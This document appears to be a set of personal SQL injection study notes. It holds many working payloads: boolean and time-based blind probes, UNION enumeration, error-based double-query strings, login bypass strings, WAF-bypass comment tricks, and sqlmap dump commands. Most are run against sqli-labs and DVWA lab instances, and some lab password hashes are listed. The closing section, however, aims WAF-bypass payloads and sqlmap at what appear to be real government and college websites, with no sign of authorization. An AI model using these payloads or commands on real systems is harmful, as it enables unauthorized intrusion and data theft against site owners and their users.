Blind SQLi
Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.
When an attacker exploits SQL injection, sometimes the web application displays error messages from the database complaining that the SQL Query’s syntax is incorrect. Blind SQL injection is nearly identical to normal SQL Injection, the only difference being the way the data is retrieved from the database. When the database does not output data to the web page, an attacker is forced to steal data by asking the database a series of true or false questions. This makes exploiting the SQL Injection vulnerability more difficult, but not impossible.
http://www.mysqltutorial.org/mysql-substring.aspx
*NOTE: Functions to call in blind sql injection the URL provided to call your self-study.
https://null-byte.wonderhowto.com/forum/explotation-blind-boolean-based-sql-injection-by-mohamed-ahmed-0179938/
*NOTE: Null-byte sql injection to self-study.
Practical side:
Blind SQLI
Blind Boolien based sql Injection.
and 1=1 {true}
and 1=2 {false}
and “a”=”b”
and database()=”xyz”
we cannot assume the database so, in that case we will try some MySQL functions to extract data from the database.
and substring(database(),1,1)=”a”
http://192.168.1.103/sqli-labs-master/Less-8/?id=1′ and substring(database(),1,1)=”s” —
{true well that means first character of first database is s}
http://192.168.1.103/sqli-labs-master/Less-8/?id=1′ and substring(database(),2,1)=”e” —
{true second character of first database is e}
Blind Time-based SQL Injection.
Time-Based SQL Injection
Time-based SQL injection involves sending requests to the database and analyzing server response times in order to deduce information. We can do this by taking advantage of sleep and time delay functions that are utilized in database systems. Like before, we can use the ASCII() and SUBSTRING() functions to aid in enumerating a field along with a new function called SLEEP().
https://null-byte.wonderhowto.com/how-to/sql-injection-101-advanced-techniques-for-maximum-exploitation-0184658/
Learn SQLi Query Fixing
- identify sqli vulnerability
‘
“
\ - balance the query
http://192.168.1.103/sqli-labs-master/Less-1/?id=1 {front end}
select id =’id’ where name =’xyz’ {background}
how to fix
http://192.168.1.103/sqli-labs-master/Less-1/?id=1′ —
select id =’1′ — ‘ where name =’xyz’ {background}
Less-2
in background
select id=1 — where name =xyz
how to fix query
http://192.168.1.103/sqli-labs-master/Less-2/?id=1 —
Less-3
in background
select id = (‘1\’) where name =(‘xyz’)
SQLI Through Get Based
Less-1
http://192.168.1.103/sqli-labs-master/Less-1/?id=1′ — {balanced query }
- find total no of vulnerable columns
order by 1{same page }
order by 2 {same page }
order by n {different page }
there is n-1 columns are prsenet
http://192.168.1.103/sqli-labs-master/Less-1/?id=1′ order by 1 —
- find exact no of vulnerable columns out of these n-1
union all select 1,2,…n-1
example
union all select 1,2,3
select id=-1′ union all select 1,2,3 — where name =xyz
executed – http://192.168.1.103/sqli-labs-master/Less-1/?id=-1′ union all select 1,2,3 —
- execute any datbase sqli query there
on that reflect no
example – database()
version()
user()
executed – http://192.168.1.103/sqli-labs-master/Less-1/?id=-1′ union all select 1,database(),3 —
http://192.168.1.103/sqli-labs-master/Less-1/?id=-1′ union all select 1,database(),user() —
situation you are getting error but you are not getting output of union sqli statement in that case there may error based sqli or may be double query based sql injection.
http://192.168.1.103/sqli-labs-master/Less-5/?id=-1′ —
error/double based sqli query -> hackbar->error/double->get database
Blind SQLI
blind boolien based sqli
and 1=1 {true }
and 1=2 {false }
and “a”=”b”
and database()=”xyz”
we can not assume the database
and substring(database(),1,1)=”a”
http://192.168.1.103/sqli-labs-master/Less-8/?id=1′ and substring(database(),1,1)=”s” — {true vale that means first character of first database is s}
http://192.168.1.103/sqli-labs-master/Less-8/?id=1′ and substring(database(),2,1)=”e” — {true second character of first database is e}
blind time based sqli
‘ and sleep(10) —
” and sleep(10) —
‘) and sleep(10) —
how to extract database for blind time based sqli
‘ and sleep(10) and 1=1 —
i gave http://192.168.1.103/sqli-labs-master/Less-9/?id=1′ and sleep(10) and database()=”security” — its sleeping that’s means
http://192.168.1.103/sqli-labs-master/Less-9/?id=1′ and sleep(10) and database()=”xyz” — {its not sleeping for 10 sec }
Exploitation of GET Based sqli
- Database List –
hackbar->union->database->group_concat
information_schema
challenges
dvwa
MetasploitMySQLowasp10
security
tikiwiki
tikiwiki195
2.find tables of a database -dvwa
hackbar->union->tables->group_concat
guestbook
users
- find columns of a table – guestbook
comment_id
comment
name
- data of that columns
name,comment
hackbar->union->data->group_concat
name,”<——>”,comment,”—->”,third
Error Based Double Query Exploitaion
what about other database
for if want to fetch remaining database
you have to increase first value of first limit
LIMIT 1,1 – challenges
LIMIT 2,1 – dvwa
LIMIT 3,1 – metasploit
tables
default tables
LIMIT 0,1 – guestbook
LIMIT 1,1 – users
LIMIT 2,1 — you are not getting anything that means there is only two tables
columns for double query based
LIMIT 0,1 – user_id
LIMIT 1,1. — first name
LIMIT 2,1)). — last_name
LIMIT 3,1)). —- user
LIMIT 4,1)). — password
LIMIT 5,1)). — avatar
LIMIT 0,1)). —- nothing
Data of these columns
user password
admin 5f4dcc3b5aa765d61d8327deb882cf99
Gordon e99a18c428cb38d5f260853678922e03
1337 8d3533d75ae2c3966d7e0d4fcc69216b
Pablo
Post Based SQLI
Balance the query
‘ —
problem is not working with post based
instead of use space ( )
or you can also use # to fix
is also used for comment out part of sqli query
— or #
find total no of vulnerable columns
order by 1
find exact no of vulnerable columns
‘ union all select 1,2 #
execute database query
‘ union all select database(),user() #
Less -12
“) union all select 1,2 #
“) union all select database(),user() #
Less-13
‘) #
‘) order by 3#
‘) order by 2 # {order by 2 worked }
‘) union all select 1,2#
situation you are getting error but you are not getting output of union sqli statement in that case there may error based sqli or may be double query based sqli
” AND(SELECT 1 from(SELECT COUNT(),CONCAT((SELECT (SELECT (SELECT DISTINCT CONCAT(0x7e,0x27,CAST(schema_name AS CHAR),0x27,0x7e) FROM INFORMATION_SCHEMA.SCHEMATA WHERE table_schema!=DATABASE() LIMIT 1,1)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1), FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) AND 1=1 #
Blind boolien post based sqli
Less-15
‘ OR 1=1 #
” OR 1=1 #
‘) OR 1=1 #
“) OR 1=1 #
‘ OR database()=”security” #
‘ OR substring(database(),1,1)=”a” #
‘ OR substring(database(),1,1)=”s” #
first character of database is s
‘ OR substring(database(),2,1)=”e” #
second character of database is e
Less-16
Blind time based
‘ OR sleep(10) #
” OR sleep(10) #
‘) OR sleep(10) #
“) OR sleep(10) # {worked}
“) OR sleep(10) and 1=1 #
“) OR sleep(10) and substring(database(),3,1)=”a” #
application is sleeping when we fired this
“) OR sleep(10) and substring(database(),3,1)=”c” #
that means third character of database is c
Less-17
understand the business logic here
password reset require existing user
default username for this lab is admin
Exploitation of POST Based SQLI
Less-11
inject database query
- database list
hackbar -> union -> database-> group_concat
‘ union all select (SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),2 #
information_schema
challenges
dvwa
MetasploitMySQLowasp10
security
tikiwiki
tikiwiki195
- find table of a database – security
‘ union all select (SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x7365637572697479),2 #
emails
referrersuser-agents
users
- find columns of a table – users
hackbar->union->columns->group_concat
‘ union all select (SELECT GROUP_CONCAT(column_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x7573657273),2 #
user_id
first_name
last_name
user
password
avatar
id
username
password
- data of these columns – user, password
user,”<—–>“, password
‘ union all select 1,(SELECT GROUP_CONCAT(username,”<—–>”,password SEPARATOR 0x3c62723e) FROM security.users) #
Error Based Double Query Exploitation Post Method
‘) AND(SELECT 1 from(SELECT COUNT(),CONCAT((SELECT (SELECT (SELECT DISTINCT CONCAT(0x7e,0x27,CAST(schema_name AS CHAR),0x27,0x7e) FROM INFORMATION_SCHEMA.SCHEMATA WHERE table_schema!=DATABASE() LIMIT 3,1)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1), FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) AND 1=1 #
Header Based sqli
if any application will have to store your headers info into their database there may be headers based sqli
if you will be logged in an application
Cookie Based SQLI
target – testphp.vulnweb.com
Balance Query
‘ —
‘ and ‘x’=’x
select login=’test/test’ and ‘x’=’x ‘ where something other part of query
Header Based sqli
Balance Query
‘ —
‘ and ‘a’=’a
select referrer=’value ‘ OR SLEEP(5) and ‘a’=’a ‘ something other part of query
WAF-Web application firewall by passing.
earlier i tried
‘ order by 1 –+
when I tried
‘ union all select 1,2,3,4,5,6,7 –+
i got not acceptable error
either union may be illegal keyword
may be all will be illegal input
select
illegal word (word)= /!12345word/
‘ /!12345union/ all select 1,2,3 –+
http://multan.gov.pk/page.php?data=-2′ /!12345union/ all select 1,2,database(),4,5,6,7 –+
now exploit this
all database list
hackbar->union->database->group_concat
on any reflect no
(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)
‘ /!12345union/ all select 1,2,(SELECT+/!12345GROUP_CONCAT/(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),4,5,6,7 –+
Authentication Bypassing through SQLI
let’s assume background of login page
select username =’value1’&password=’value2′ where some other part of query
value1 = ‘ OR 1=1 —
select username =” OR 1=1 — ‘&password=’value2’ where some other part of query
value1= 1′ OR ‘1’=’1
select username =’1′ OR ‘1’=’1 ‘&password=’value2’ where some other part of query
Less-11
SQLMAP GET Based
python sqlmap.py -u “http://192.168.0.103/sqli-labs-master/Less-1/?id=1*” –batch –banner
- database list
–dbs
example
python sqlmap.py -u “http://192.168.0.103/sqli-labs-master/Less-1/?id=1*” –batch –banner –dbs
- find tables of a database – dvwa
-D DBNAME –tables
example
python sqlmap.py -u “http://192.168.0.103/sqli-labs-master/Less-1/?id=1*” –batch –banner -D dvwa –tables
- columns of any table – users
-D DBNAME -T TBNAME –columns
example:
python sqlmap.py -u “http://192.168.0.103/sqli-labs-master/Less-1/?id=1*” –batch –banner -D dvwa -T users –columns
- data of these columns – user, first_name, password
-D DBNAME -T TBNAME -C col1,col2,col3 –dump
example :
python sqlmap.py -u “http://192.168.0.103/sqli-labs-master/Less-1/?id=1*” –batch –banner -D dvwa -T users -C user,first_name,password –dump
POST | Header | and Cookie based SQLI through SQLmap
commands
python sqlmap.py -r requestfile –batch –banner
python sqlmap.py -r less11.txt –batch –banner
WAF Bypass with sqlmap
sqlmap.py -u “URL” –batch –banner –tamper=modsecurityversioned
python sqlmap.py -u “http://multan.gov.pk/page.php?data=50*” –batch –banner –tamper=modsecurityversioned
python sqlmap.py -u “http://citicollege.edu.pk/main.php?Id=1*” –batch –banner
